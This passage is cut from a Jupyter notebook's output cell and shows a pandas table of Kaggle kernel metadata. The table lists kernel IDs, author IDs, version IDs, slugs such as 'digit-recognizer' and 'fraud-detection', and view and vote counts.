" <td>False</td>\n",
" <td>rf-proximity</td>\n",
" <td>3.0</td>\n",
" <td>7547</td>\n",
" <td>1</td>\n",
" <td>12</td>\n",
" <td>1</td>\n",
" </tr>\n",
" <tr>\n",
" <th>2</th>\n",
" <td>4</td>\n",
" <td>3716</td>\n",
" <td>41.0</td>\n",
" <td>NaN</td>\n",
" <td>NaN</td>\n",
" <td>9.0</td>\n",
" <td>False</td>\n",
" <td>r-version</td>\n",
" <td>NaN</td>\n",
" <td>9</td>\n",
" <td>0</td>\n",
" <td>0</td>\n",
" <td>1</td>\n",
" </tr>\n",
" <tr>\n",
" <th>3</th>\n",
" <td>5</td>\n",
" <td>28963</td>\n",
" <td>19.0</td>\n",
" <td>NaN</td>\n",
" <td>NaN</td>\n",
" <td>13.0</td>\n",
" <td>False</td>\n",
" <td>test1</td>\n",
" <td>NaN</td>\n",
" <td>9</td>\n",
" <td>0</td>\n",
" <td>0</td>\n",
" <td>1</td>\n",
" </tr>\n",
" <tr>\n",
" <th>4</th>\n",
" <td>6</td>\n",
" <td>3716</td>\n",
" <td>21.0</td>\n",
" <td>NaN</td>\n",
" <td>NaN</td>\n",
" <td>15.0</td>\n",
" <td>False</td>\n",
" <td>are-icons-missing</td>\n",
" <td>NaN</td>\n",
" <td>7</td>\n",
" <td>0</td>\n",
" <td>0</td>\n",
" <td>1</td>\n",
" </tr>\n",
" <tr>\n",
" <th>5</th>\n",
" <td>7</td>\n",
" <td>3716</td>\n",
" <td>48.0</td>\n",
" <td>NaN</td>\n",
" <td>NaN</td>\n",
" <td>27.0</td>\n",
" <td>False</td>\n",
" <td>testing-version-bolding</td>\n",
" <td>NaN</td>\n",
" <td>13</td>\n",
" <td>0</td>\n",
" <td>0</td>\n",
" <td>1</td>\n",
" </tr>\n",
" <tr>\n",
" <th>6</th>\n",
" <td>9</td>\n",
" <td>3716</td>\n",
" <td>50.0</td>\n",
" <td>NaN</td>\n",
" <td>NaN</td>\n",
" <td>49.0</td>\n",
" <td>False</td>\n",
" <td>testing-version-bolding-with-new-script</td>\n",
" <td>NaN</td>\n",
" <td>2</td>\n",
" <td>0</td>\n",
" <td>0</td>\n",
" <td>1</td>\n",
" </tr>\n",
" <tr>\n",
" <th>7</th>\n",
" <td>11</td>\n",
" <td>3716</td>\n",
" <td>373.0</td>\n",
" <td>NaN</td>\n",
" <td>NaN</td>\n",
" <td>54.0</td>\n",
" <td>False</td>\n",
" <td>as-raster</td>\n",
" <td>NaN</td>\n",
" <td>2</td>\n",
" <td>0</td>\n",
" <td>0</td>\n",
" <td>1</td>\n",
" </tr>\n",
" <tr>\n",
" <th>8</th>\n",
" <td>12</td>\n",
" <td>993</td>\n",
" <td>6467.0</td>\n",
" <td>NaN</td>\n",
" <td>NaN</td>\n",
" <td>55.0</td>\n",
" <td>False</td>\n",
" <td>whoops-doing-this-logged-in-under-my-own-name</td>\n",
" <td>NaN</td>\n",
" <td>6</td>\n",
" <td>0</td>\n",
" <td>0</td>\n",
" <td>1</td>\n",
" </tr>\n",
" <tr>\n",
" <th>9</th>\n",
" <td>13</td>\n",
" <td>993</td>\n",
" <td>6468.0</td>\n",
" <td>NaN</td>\n",
" <td>NaN</td>\n",
" <td>73.0</td>\n",
" <td>False</td>\n",
" <td>installed-packages</td>\n",
" <td>NaN</td>\n",
" <td>6</td>\n",
" <td>0</td>\n",
" <td>0</td>\n",
" <td>1</td>\n",
" </tr>\n",
" <tr>\n",
" <th>10</th>\n",
" <td>14</td>\n",
" <td>993</td>\n",
" <td>269065.0</td>\n",
" <td>NaN</td>\n",
" <td>14925.0</td>\n",
" <td>77.0</td>\n",
" <td>False</td>\n",
" <td>installed-r-packages</td>\n",
" <td>NaN</td>\n",
" <td>7921</td>\n",
" <td>2</td>\n",
" <td>6</td>\n",
" <td>1</td>\n",
" </tr>\n",
" <tr>\n",
" <th>11</th>\n",
" <td>15</td>\n",
" <td>993</td>\n",
" <td>520.0</td>\n",
" <td>NaN</td>\n",
" <td>20068.0</td>\n",
" <td>140.0</td>\n",
" <td>False</td>\n",
" <td>example-handwritten-digits</td>\n",
" <td>3.0</td>\n",
" <td>29080</td>\n",
" <td>8</td>\n",
" <td>36</td>\n",
" <td>1</td>\n",
" </tr>\n",
" <tr>\n",
" <th>12</th>\n",
" <td>16</td>\n",
" <td>993</td>\n",
" <td>154.0</td>\n",
" <td>NaN</td>\n",
" <td>NaN</td>\n",
" <td>141.0</td>\n",
" <td>False</td>\n",
" <td>mean-digits</td>\n",
" <td>NaN</td>\n",
" <td>9</td>\n",
" <td>0</td>\n",
" <td>0</td>\n",
" <td>1</td>\n",
" </tr>\n",
" <tr>\n",
" <th>13</th>\n",
" <td>17</td>\n",
" <td>993</td>\n",
" <td>649.0</td>\n",
" <td>NaN</td>\n",
" <td>18337.0</td>\n",
" <td>155.0</td>\n",
" <td>False</td>\n",
" <td>pixel-mean-and-variances-by-digit</td>\n",
" <td>NaN</td>\n",
" <td>9989</td>\n",
" <td>5</td>\n",
" <td>8</td>\n",
" <td>1</td>\n",
" </tr>\n",
" <tr>\n",
" <th>14</th>\n",
" <td>20</td>\n",
" <td>993</td>\n",
" <td>803.0</td>\n",
" <td>NaN</td>\n",
" <td>NaN</td>\n",
" <td>171.0</td>\n",
" <td>False</td>\n",
" <td>random-forest-benchmark-tree-4</td>\n",
" <td>NaN</td>\n",
" <td>7</td>\n",
" <td>0</td>\n",
" <td>0</td>\n",
" <td>1</td>\n",
" </tr>\n",
" <tr>\n",
" <th>15</th>\n",
" <td>21</td>\n",
" <td>993</td>\n",
" <td>1227.0</td>\n",
" <td>NaN</td>\n",
" <td>17462.0</td>\n",
" <td>185.0</td>\n",
" <td>False</td>\n",
" <td>random-forest-benchmark-1</td>\n",
" <td>2.0</td>\n",
" <td>52294</td>\n",
" <td>23</td>\n",
" <td>91</td>\n",
" <td>1</td>\n",
" </tr>\n",
" <tr>\n",
" <th>16</th>\n",
" <td>22</td>\n",
" <td>206545</td>\n",
" <td>190.0</td>\n",
" <td>NaN</td>\n",
" <td>NaN</td>\n",
" <td>188.0</td>\n",
" <td>False</td>\n",
" <td>dougg-test</td>\n",
" <td>NaN</td>\n",
" <td>164</td>\n",
" <td>0</td>\n",
" <td>0</td>\n",
" <td>1</td>\n",
" </tr>\n",
" <tr>\n",
" <th>17</th>\n",
" <td>23</td>\n",
" <td>114978</td>\n",
" <td>193.0</td>\n",
" <td>NaN</td>\n",
" <td>NaN</td>\n",
" <td>191.0</td>\n",
" <td>False</td>\n",
" <td>some-basic-stats</td>\n",
" <td>NaN</td>\n",
" <td>230</td>\n",
" <td>0</td>\n",
" <td>0</td>\n",
" <td>1</td>\n",
" </tr>\n",
" <tr>\n",
" <th>18</th>\n",
" <td>24</td>\n",
" <td>114978</td>\n",
" <td>308.0</td>\n",
" <td>NaN</td>\n",
" <td>NaN</td>\n",
" <td>194.0</td>\n",
" <td>False</td>\n",
" <td>rotate-all-the-features</td>\n",
" <td>NaN</td>\n",
" <td>2491</td>\n",
" <td>0</td>\n",
" <td>4</td>\n",
" <td>1</td>\n",
" </tr>\n",
" <tr>\n",
" <th>19</th>\n",
" <td>25</td>\n",
" <td>993</td>\n",
" <td>213.0</td>\n",
" <td>NaN</td>\n",
" <td>NaN</td>\n",
" <td>209.0</td>\n",
" <td>False</td>\n",
" <td>running-system-commands</td>\n",
" <td>NaN</td>\n",
" <td>0</td>\n",
" <td>0</td>\n",
" <td>0</td>\n",
" <td>1</td>\n",
" </tr>\n",
" <tr>\n",
" <th>20</th>\n",
" <td>26</td>\n",
" <td>993</td>\n",
" <td>212.0</td>\n",
" <td>NaN</td>\n",
" <td>NaN</td>\n",
" <td>212.0</td>\n",
" <td>False</td>\n",
" <td>running-system-commands-1</td>\n",
" <td>NaN</td>\n",
" <td>84</td>\n",
" <td>0</td>\n",
" <td>0</td>\n",
" <td>1</td>\n",
" </tr>\n",
" <tr>\n",
" <th>21</th>\n",
" <td>27</td>\n",
" <td>993</td>\n",
" <td>294.0</td>\n",
" <td>NaN</td>\n",
" <td>35477.0</td>\n",
" <td>214.0</td>\n",
" <td>False</td>\n",
" <td>we-have-imagemagick-installed</td>\n",
" <td>NaN</td>\n",
" <td>685</td>\n",
" <td>1</td>\n",
" <td>0</td>\n",
" <td>1</td>\n",
" </tr>\n",
" <tr>\n",
" <th>22</th>\n",
" <td>29</td>\n",
" <td>114978</td>\n",
" <td>238.0</td>\n",
" <td>NaN</td>\n",
" <td>NaN</td>\n",
" <td>216.0</td>\n",
" <td>False</td>\n",
" <td>randombananaclassifier</td>\n",
" <td>NaN</td>\n",
" <td>766</td>\n",
" <td>0</td>\n",
" <td>1</td>\n",
" <td>1</td>\n",
" </tr>\n",
" <tr>\n",
" <th>23</th>\n",
" <td>30</td>\n",
" <td>9679</td>\n",
" <td>236.0</td>\n",
" <td>NaN</td>\n",
" <td>NaN</td>\n",
" <td>236.0</td>\n",
" <td>False</td>\n",
" <td>mytest</td>\n",
" <td>NaN</td>\n",
" <td>124</td>\n",
" <td>0</td>\n",
" <td>0</td>\n",
" <td>1</td>\n",
" </tr>\n",
" <tr>\n",
" <th>24</th>\n",
" <td>31</td>\n",
" <td>185835</td>\n",
" <td>261.0</td>\n",
" <td>NaN</td>\n",
" <td>NaN</td>\n",
" <td>239.0</td>\n",
" <td>False</td>\n",
" <td>peek-data</td>\n",
" <td>NaN</td>\n",
" <td>1064</td>\n",
" <td>0</td>\n",
" <td>0</td>\n",
" <td>1</td>\n",
" </tr>\n",
" <tr>\n",
" <th>25</th>\n",
" <td>32</td>\n",
" <td>19605</td>\n",
" <td>244.0</td>\n",
" <td>NaN</td>\n",
" <td>NaN</td>\n",
" <td>244.0</td>\n",
" <td>False</td>\n",
" <td>example-r</td>\n",
" <td>NaN</td>\n",
" <td>337</td>\n",
" <td>0</td>\n",
" <td>0</td>\n",
" <td>1</td>\n",
" </tr>\n",
" <tr>\n",
" <th>26</th>\n",
" <td>33</td>\n",
" <td>319768</td>\n",
" <td>253.0</td>\n",
" <td>NaN</td>\n",
" <td>NaN</td>\n",
" <td>253.0</td>\n",
" <td>False</td>\n",
" <td>testo</td>\n",
" <td>NaN</td>\n",
" <td>58</td>\n",
" <td>0</td>\n",
" <td>0</td>\n",
" <td>1</td>\n",
" </tr>\n",
" <tr>\n",
" <th>27</th>\n",
" <td>34</td>\n",
" <td>28963</td>\n",
" <td>19064.0</td>\n",
" <td>NaN</td>\n",
" <td>NaN</td>\n",
" <td>262.0</td>\n",
" <td>False</td>\n",
" <td>python</td>\n",
" <td>NaN</td>\n",
" <td>7</td>\n",
" <td>0</td>\n",
" <td>0</td>\n",
" <td>1</td>\n",
" </tr>\n",
" <tr>\n",
" <th>28</th>\n",
" <td>35</td>\n",
" <td>320040</td>\n",
" <td>264.0</td>\n",
" <td>NaN</td>\n",
" <td>NaN</td>\n",
" <td>263.0</td>\n",
" <td>False</td>\n",
" <td>digit-recognizer</td>\n",
" <td>NaN</td>\n",
" <td>142</td>\n",
" <td>0</td>\n",
" <td>0</td>\n",
" <td>1</td>\n",
" </tr>\n",
" <tr>\n",
" <th>29</th>\n",
" <td>39</td>\n",
" <td>319893</td>\n",
" <td>552.0</td>\n",
" <td>NaN</td>\n",
" <td>NaN</td>\n",
" <td>321.0</td>\n",
" <td>False</td>\n",
" <td>digit-recognizer-using-knn</td>\n",
" <td>NaN</td>\n",
" <td>717</td>\n",
" <td>0</td>\n",
" <td>0</td>\n",
" <td>1</td>\n",
" </tr>\n",
" <tr>\n",
" <th>...</th>\n",
" <td>...</td>\n",
" <td>...</td>\n",
" <td>...</td>\n",
" <td>...</td>\n",
" <td>...</td>\n",
" <td>...</td>\n",
" <td>...</td>\n",
" <td>...</td>\n",
" <td>...</td>\n",
" <td>...</td>\n",
" <td>...</td>\n",
" <td>...</td>\n",
" <td>...</td>\n",
" </tr>\n",
" <tr>\n",
" <th>201951</th>\n",
" <td>1875333</td>\n",
" <td>442623</td>\n",
" <td>6498125.0</td>\n",
" <td>NaN</td>\n",
" <td>NaN</td>\n",
" <td>6495275.0</td>\n",
" <td>False</td>\n",
" <td>project-euler-21</td>\n",
" <td>NaN</td>\n",
" <td>18</td>\n",
" <td>0</td>\n",
" <td>1</td>\n",
" <td>2</td>\n",
" </tr>\n",
" <tr>\n",
" <th>201952</th>\n",
" <td>1875398</td>\n",
" <td>1497793</td>\n",
" <td>6497141.0</td>\n",
" <td>2395222.0</td>\n",
" <td>NaN</td>\n",
" <td>6497049.0</td>\n",
" <td>False</td>\n",
" <td>ny-stock-price-prediction-rnn-lstm-gru-eb2000</td>\n",
" <td>NaN</td>\n",
" <td>37</td>\n",
" <td>0</td>\n",
" <td>0</td>\n",
" <td>2</td>\n",
" </tr>\n",
" <tr>\n",
" <th>201953</th>\n",
" <td>1875414</td>\n",
" <td>2080166</td>\n",
" <td>6494175.0</td>\n",
" <td>NaN</td>\n",
" <td>NaN</td>\n",
" <td>6494175.0</td>\n",
" <td>False</td>\n",
" <td>starter-banknote-f2165545-1</td>\n",
" <td>NaN</td>\n",
" <td>0</td>\n",
" <td>0</td>\n",
" <td>0</td>\n",
" <td>2</td>\n",
" </tr>\n",
" <tr>\n",
" <th>201954</th>\n",
" <td>1875417</td>\n",
" <td>1776773</td>\n",
" <td>6499806.0</td>\n",
" <td>NaN</td>\n",
" <td>NaN</td>\n",
" <td>6498408.0</td>\n",
" <td>False</td>\n",
" <td>lightgbm-automated-feature-engineering-easy</td>\n",
" <td>NaN</td>\n",
" <td>57</td>\n",
" <td>0</td>\n",
" <td>1</td>\n",
" <td>2</td>\n",
" </tr>\n",
" <tr>\n",
" <th>201955</th>\n",
" <td>1915910</td>\n",
" <td>498422</td>\n",
" <td>6657552.0</td>\n",
" <td>6528403.0</td>\n",
" <td>NaN</td>\n",
" <td>6655666.0</td>\n",
" <td>False</td>\n",
" <td>a3-demo-decision-trees</td>\n",
" <td>NaN</td>\n",
" <td>29</td>\n",
" <td>0</td>\n",
" <td>0</td>\n",
" <td>2</td>\n",
" </tr>\n",
" <tr>\n",
" <th>201956</th>\n",
" <td>1915916</td>\n",
" <td>2080166</td>\n",
" <td>6655493.0</td>\n",
" <td>NaN</td>\n",
" <td>NaN</td>\n",
" <td>6655493.0</td>\n",
" <td>False</td>\n",
" <td>starter-twitter-worlds2018-0cb7d034-3</td>\n",
" <td>NaN</td>\n",
" <td>3</td>\n",
" <td>0</td>\n",
" <td>0</td>\n",
" <td>2</td>\n",
" </tr>\n",
" <tr>\n",
" <th>201957</th>\n",
" <td>1915988</td>\n",
" <td>1660833</td>\n",
" <td>6656526.0</td>\n",
" <td>NaN</td>\n",
" <td>NaN</td>\n",
" <td>6655878.0</td>\n",
" <td>False</td>\n",
" <td>starter-twitter-worlds2018</td>\n",
" <td>NaN</td>\n",
" <td>39</td>\n",
" <td>0</td>\n",
" <td>1</td>\n",
" <td>2</td>\n",
" </tr>\n",
" <tr>\n",
" <th>201958</th>\n",
" <td>1916035</td>\n",
" <td>1179427</td>\n",
" <td>6661990.0</td>\n",
" <td>NaN</td>\n",
" <td>NaN</td>\n",
" <td>6661990.0</td>\n",
" <td>False</td>\n",
" <td>tutorial-linear-regression</td>\n",
" <td>NaN</td>\n",
" <td>22</td>\n",
" <td>0</td>\n",
" <td>0</td>\n",
" <td>2</td>\n",
" </tr>\n",
" <tr>\n",
" <th>201959</th>\n",
" <td>1916052</td>\n",
" <td>1828058</td>\n",
" <td>6730922.0</td>\n",
" <td>NaN</td>\n",
" <td>NaN</td>\n",
" <td>6656151.0</td>\n",
" <td>False</td>\n",
" <td>mks-proteins</td>\n",
" <td>NaN</td>\n",
" <td>208</td>\n",
" <td>0</td>\n",
" <td>0</td>\n",
" <td>1</td>\n",
" </tr>\n",
" <tr>\n",
" <th>201960</th>\n",
" <td>1916057</td>\n",
" <td>1601569</td>\n",
" <td>6730437.0</td>\n",
" <td>6633328.0</td>\n",
" <td>NaN</td>\n",
" <td>6668207.0</td>\n",
" <td>False</td>\n",
" <td>exploration-of-f1-dataset-1102f3-aaf5b9</td>\n",
" <td>NaN</td>\n",
" <td>41</td>\n",
" <td>0</td>\n",
" <td>0</td>\n",
" <td>2</td>\n",
" </tr>\n",
" <tr>\n",
" <th>201961</th>\n",
" <td>1916068</td>\n",
" <td>1267737</td>\n",
" <td>6656222.0</td>\n",
" <td>NaN</td>\n",
" <td>NaN</td>\n",
" <td>6656222.0</td>\n",
" <td>False</td>\n",
" <td>fraud-detection</td>\n",
" <td>NaN</td>\n",
" <td>17</td>\n",
" <td>0</td>\n",
" <td>0</td>\n",
" <td>2</td>\n",
" </tr>\n",
" <tr>\n",
" <th>201962</th>\n",
" <td>1916091</td>\n",
" <td>756325</td>\n",
" <td>6656455.0</td>\n",
" <td>NaN</td>\n",
" <td>69117.0</td>\n",
" <td>6656455.0</td>\n",
" <td>False</td>\n",
" <td>google-customer-revenue-prediction</td>\n",
" <td>NaN</td>\n",
" <td>239</td>\n",
" <td>3</td>\n",
" <td>3</td>\n",
" <td>2</td>\n",
" </tr>\n",
" <tr>\n",
" <th>201963</th>\n",
" <td>1916101</td>\n",
" <td>1090244</td>\n",
" <td>6690675.0</td>\n",
" <td>NaN</td>\n",
" <td>NaN</td>\n",
" <td>6656399.0</td>\n",
" <td>False</td>\n",
" <td>diabeticretinopathyvgg16-finetuning</td>\n",
" <td>NaN</td>\n",
" <td>144</td>\n",
" <td>0</td>\n",
" <td>1</td>\n",
" <td>2</td>\n",
" </tr>\n",
" <tr>\n",
" <th>201964</th>\n",
" <td>1916124</td>\n",
" <td>1170777</td>\n",
" <td>6805081.0</td>\n",
" <td>6632919.0</td>\n",
" <td>NaN</td>\n",
" <td>6805081.0</td>\n",
" <td>False</td>\n",
" <td>protein-atlas-exploration-and-baseline</td>\n",
" <td>NaN</td>\n",
" <td>17</td>\n",
" <td>0</td>\n",
" <td>0</td>\n",
" <td>2</td>\n",
" </tr>\n",
" <tr>\n",
" <th>201965</th>\n",
" <td>1916181</td>\n",
" <td>2386017</td>\n",
" <td>6660035.0</td>\n",
" <td>NaN</td>\n",
" <td>NaN</td>\n",
" <td>6659703.0</td>\n",
" <td>False</td>\n",
" <td>01-iris-species</td>\n",
" <td>NaN</td>\n",
" <td>36</td>\n",
" <td>0</td>\n",
" <td>1</td>\n",
" <td>2</td>\n",
" </tr>\n",
" <tr>\n",
" <th>201966</th>\n",
" <td>1916199</td>\n",
" <td>2108937</td>\n",
" <td>6938214.0</td>\n",
" <td>NaN</td>\n",
" <td>NaN</td>\n",
" <td>6657733.0</td>\n",
" <td>False</td>\n",
" <td>chicago-crime-investigation</td>\n",
" <td>NaN</td>\n",
" <td>71</td>\n",
" <td>0</td>\n",
" <td>0</td>\n",
" <td>2</td>\n",
" </tr>\n",
" <tr>\n",
" <th>201967</th>\n",
" <td>1916215</td>\n",
" <td>637434</td>\n",
" <td>6904698.0</td>\n",
" <td>6600035.0</td>\n",
" <td>69362.0</td>\n",
" <td>6657640.0</td>\n",
" <td>False</td>\n",
" <td>cnn-128x128x4-keras-from-scratch-lb-0-328</td>\n",
" <td>2.0</td>\n",
" <td>1808</td>\n",
" <td>15</td>\n",
" <td>36</td>\n",
" <td>2</td>\n",
" </tr>\n",
" <tr>\n",
" <th>201968</th>\n",
" <td>1916243</td>\n",
" <td>885589</td>\n",
" <td>6895750.0</td>\n",
" <td>6601958.0</td>\n",
" <td>NaN</td>\n",
" <td>6656920.0</td>\n",
" <td>False</td>\n",
" <td>transforma-o-de-vari-veis</td>\n",
" <td>NaN</td>\n",
" <td>117</td>\n",
" <td>0</td>\n",
" <td>13</td>\n",
" <td>2</td>\n",
" </tr>\n",
" <tr>\n",
" <th>201969</th>\n",
" <td>1916268</td>\n",
" <td>1113072</td>\n",
" <td>6941531.0</td>\n",
" <td>NaN</td>\n",
" <td>69337.0</td>\n",
" <td>6658725.0</td>\n",
" <td>False</td>\n",
" <td>apply-t-sne-on-news</td>\n",
" <td>3.0</td>\n",
" <td>907</td>\n",
" <td>7</td>\n",
" <td>15</td>\n",
" <td>2</td>\n",
" </tr>\n",
" <tr>\n",
" <th>201970</th>\n",
" <td>1916283</td>\n",
" <td>885589</td>\n",
" <td>6684908.0</td>\n",
" <td>6601958.0</td>\n",
" <td>NaN</td>\n",
" <td>6657006.0</td>\n",
" <td>False</td>\n",
" <td>redu-o-de-dimensionalidade</td>\n",
" <td>NaN</td>\n",
" <td>43</td>\n",
" <td>0</td>\n",
" <td>1</td>\n",
" <td>2</td>\n",
" </tr>\n",
" <tr>\n",
" <th>201971</th>\n",
" <td>1916285</td>\n",
" <td>885589</td>\n",
" <td>6681010.0</td>\n",
" <td>6601958.0</td>\n",
" <td>NaN</td>\n",
" <td>6657012.0</td>\n",
" <td>False</td>\n",
" <td>clusteriza-o</td>\n",
" <td>NaN</td>\n",
" <td>33</td>\n",
" <td>0</td>\n",
" <td>1</td>\n",
" <td>2</td>\n",
" </tr>\n",
" <tr>\n",
" <th>201972</th>\n",
" <td>1916310</td>\n",
" <td>2080166</td>\n",
" <td>6657002.0</td>\n",
" <td>NaN</td>\n",
" <td>NaN</td>\n",
" <td>6657002.0</td>\n",
" <td>False</td>\n",
" <td>starter-twitter-data-4e7ab639-b</td>\n",
" <td>NaN</td>\n",
" <td>2</td>\n",
" <td>0</td>\n",
" <td>0</td>\n",
" <td>2</td>\n",
" </tr>\n",
" <tr>\n",
" <th>201973</th>\n",
" <td>1916350</td>\n",
" <td>2092403</td>\n",
" <td>6671885.0</td>\n",
" <td>NaN</td>\n",
" <td>69316.0</td>\n",
" <td>6659016.0</td>\n",
" <td>False</td>\n",
" <td>how-to-score-0-0255-0-0245-top-10-score</td>\n",
" <td>NaN</td>\n",
" <td>552</td>\n",
" <td>2</td>\n",
" <td>10</td>\n",
" <td>2</td>\n",
" </tr>\n",
" <tr>\n",
" <th>201974</th>\n",
" <td>1916366</td>\n",
" <td>2225268</td>\n",
" <td>6670628.0</td>\n",
" <td>NaN</td>\n",
" <td>NaN</td>\n",
" <td>6657409.0</td>\n",
" <td>False</td>\n",
" <td>house-price-xgboost</td>\n",
" <td>NaN</td>\n",
" <td>11</td>\n",
" <td>0</td>\n",
" <td>0</td>\n",
" <td>2</td>\n",
" </tr>\n",
" <tr>\n",
" <th>201975</th>\n",
" <td>1916461</td>\n",
" <td>2080166</td>\n",
" <td>6657685.0</td>\n",
" <td>NaN</td>\n",
" <td>NaN</td>\n",
" <td>6657685.0</td>\n",
" <td>False</td>\n",
" <td>starter-twitter-sentiment-analysis-f08e9d52-d</td>\n",
" <td>NaN</td>\n",
" <td>4</td>\n",
" <td>0</td>\n",
" <td>0</td>\n",
" <td>2</td>\n",
" </tr>\n",
" <tr>\n",
" <th>201976</th>\n",
" <td>1916539</td>\n",
" <td>1162757</td>\n",
" <td>6659497.0</td>\n",
" <td>NaN</td>\n",
" <td>NaN</td>\n",
" <td>6659320.0</td>\n",
" <td>False</td>\n",
" <td>mnist-with-fastai-style</td>\n",
" <td>NaN</td>\n",
" <td>6</td>\n",
" <td>0</td>\n",
" <td>0</td>\n",
" <td>2</td>\n",
" </tr>\n",
" <tr>\n",
" <th>201977</th>\n",
" <td>1916566</td>\n",
" <td>1270421</td>\n",
" <td>6658657.0</td>\n",
" <td>NaN</td>\n",
" <td>NaN</td>\n",
" <td>6658657.0</td>\n",
" <td>False</td>\n",
" <td>a-begining-try</td>\n",
" <td>NaN</td>\n",
" <td>31</td>\n",
" <td>0</td>\n",
" <td>0</td>\n",
" <td>2</td>\n",
" </tr>\n",
" <tr>\n",
" <th>201978</th>\n",
" <td>1916572</td>\n",
" <td>2373215</td>\n",
" <td>6658820.0</td>\n",
" <td>1847749.0</td>\n",
" <td>NaN</td>\n",
" <td>6658820.0</td>\n",
" <td>False</td>\n",
" <td>getting-started-in-r-first-steps-337898</td>\n",
" <td>NaN</td>\n",
" <td>4</td>\n",
" <td>0</td>\n",
" <td>0</td>\n",
" <td>1</td>\n",
" </tr>\n",
" <tr>\n",
" <th>201979</th>\n",
" <td>1916595</td>\n",
" <td>2355967</td>\n",
" <td>6658417.0</td>\n",
" <td>NaN</td>\n",
" <td>NaN</td>\n",
" <td>6658388.0</td>\n",
" <td>False</td>\n",
" <td>my-first-data-science-homework</td>\n",
" <td>NaN</td>\n",
" <td>70</td>\n",
" <td>0</td>\n",
" <td>2</td>\n",
" <td>2</td>\n",
" </tr>\n",
" <tr>\n",
" <th>201980</th>\n",
" <td>1916605</td>\n",
" <td>1977282</td>\n",
" <td>6818544.0</td>\n",
" <td>NaN</td>\n",
" <td>69150.0</td>\n",
" <td>6660859.0</td>\n",
" <td>False</td>\n",
" <td>u-s-democrat-and-republican-tweet-exploration</td>\n",
" <td>NaN</td>\n",
" <td>82</td>\n",
" <td>2</td>\n",
" <td>4</td>\n",
" <td>1</td>\n",
" </tr>\n",
" </tbody>\n",
"</table>\n",
"<p>201981 rows × 13 columns</p>\n",
"</div>"
],
"text/plain": [
" Id AuthorUserId CurrentKernelVersionId \\\n",
"0 1 2505 205.0 \n",
"1 2 3716 1748.0 \n",
"2 4 3716 41.0 \n",
"3 5 28963 19.0 \n",
"4 6 3716 21.0 \n",
"5 7 3716 48.0 \n",
"6 9 3716 50.0 \n",
"7 11 3716 373.0 \n",
"8 12 993 6467.0 \n",
"9 13 993 6468.0 \n",
"10 14 993 269065.0 \n",
"11 15 993 520.0 \n",
"12 16 993 154.0 \n",
"13 17 993 649.0 \n",
"14 20 993 803.0 \n",
"15 21 993 1227.0 \n",
"16 22 206545 190.0 \n",
"17 23 114978 193.0 \n",
"18 24 114978 308.0 \n",
"19 25 993 213.0 \n",
"20 26 993 212.0 \n",
"21 27 993 294.0 \n",
"22 29 114978 238.0 \n",
"23 30 9679 236.0 \n",
"24 31 185835 261.0 \n",
"25 32 19605 244.0 \n",
"26 33 319768 253.0 \n",
"27 34 28963 19064.0 \n",
"28 35 320040 264.0 \n",
"29 39 319893 552.0 \n",
"... ... ... ... \n",
"201951 1875333 442623 6498125.0 \n",
"201952 1875398 1497793 6497141.0 \n",
"201953 1875414 2080166 6494175.0 \n",
"201954 1875417 1776773 6499806.0 \n",
"201955 1915910 498422 6657552.0 \n",
"201956 1915916 2080166 6655493.0 \n",
"201957 1915988 1660833 6656526.0 \n",
"201958 1916035 1179427 6661990.0 \n",
"201959 1916052 1828058 6730922.0 \n",
"201960 1916057 1601569 6730437.0 \n",
"201961 1916068 1267737 6656222.0 \n",
"201962 1916091 756325 6656455.0 \n",
"201963 1916101 1090244 6690675.0 \n",
"201964 1916124 1170777 6805081.0 \n",
"201965 1916181 2386017 6660035.0 \n",
"201966 1916199 2108937 6938214.0 \n",
"201967 1916215 637434 6904698.0 \n",
"201968 1916243 885589 6895750.0 \n",
"201969 1916268 1113072 6941531.0 \n",
"201970 1916283 885589 6684908.0 \n",
"201971 1916285 885589 6681010.0 \n",
"201972 1916310 2080166 6657002.0 \n",
"201973 1916350 2092403 6671885.0 \n",
"201974 1916366 2225268 6670628.0 \n",
"201975 1916461 2080166 6657685.0 \n",
"201976 1916539 1162757 6659497.0 \n",
"201977 1916566 1270421 6658657.0 \n",
"201978 1916572 2373215 6658820.0 \n",
"201979 1916595 2355967 6658417.0 \n",
"201980 1916605 1977282 6818544.0 \n",
"\n",
" ForkParentKernelVersionId ForumTopicId FirstKernelVersionId \\\n",
"0 NaN NaN 1.0 \n",
"1 NaN 26670.0 2.0 \n",
"2 NaN NaN 9.0 \n",
"3 NaN NaN 13.0 \n",
"4 NaN NaN 15.0 \n",
"5 NaN NaN 27.0 \n",
"6 NaN NaN 49.0 \n",
"7 NaN NaN 54.0 \n",
"8 NaN NaN 55.0 \n",
"9 NaN NaN 73.0 \n",
"10 NaN 14925.0 77.0 \n",
"11 NaN 20068.0 140.0 \n",
"12 NaN NaN 141.0 \n",
"13 NaN 18337.0 155.0 \n",
"14 NaN NaN 171.0 \n",
"15 NaN 17462.0 185.0 \n",
"16 NaN NaN 188.0 \n",
"17 NaN NaN 191.0 \n",
"18 NaN NaN 194.0 \n",
"19 NaN NaN 209.0 \n",
"20 NaN NaN 212.0 \n",
"21 NaN 35477.0 214.0 \n",
"22 NaN NaN 216.0 \n",
"23 NaN NaN 236.0 \n",
"24 NaN NaN 239.0 \n",
"25 NaN NaN 244.0 \n",
"26 NaN NaN 253.0 \n",
"27 NaN NaN 262.0 \n",
"28 NaN NaN 263.0 \n",
"29 NaN NaN 321.0 \n",
"... ... ... ... \n",
"201951 NaN NaN 6495275.0 \n",
"201952 2395222.0 NaN 6497049.0 \n",
"201953 NaN NaN 6494175.0 \n",
"201954 NaN NaN 6498408.0 \n",
"201955 6528403.0 NaN 6655666.0 \n",
"201956 NaN NaN 6655493.0 \n",
"201957 NaN NaN 6655878.0 \n",
"201958 NaN NaN 6661990.0 \n",
"201959 NaN NaN 6656151.0 \n",
"201960 6633328.0 NaN 6668207.0 \n",
"201961 NaN NaN 6656222.0 \n",
"201962 NaN 69117.0 6656455.0 \n",
"201963 NaN NaN 6656399.0 \n",
"201964 6632919.0 NaN 6805081.0 \n",
"201965 NaN NaN 6659703.0 \n",
"201966 NaN NaN 6657733.0 \n",
"201967 6600035.0 69362.0 6657640.0 \n",
"201968 6601958.0 NaN 6656920.0 \n",
"201969 NaN 69337.0 6658725.0 \n",
"201970 6601958.0 NaN 6657006.0 \n",
"201971 6601958.0 NaN 6657012.0 \n",
"201972 NaN NaN 6657002.0 \n",
"201973 NaN 69316.0 6659016.0 \n",
"201974 NaN NaN 6657409.0 \n",
"201975 NaN NaN 6657685.0 \n",
"201976 NaN NaN 6659320.0 \n",
"201977 NaN NaN 6658657.0 \n",
"201978 1847749.0 NaN 6658820.0 \n",
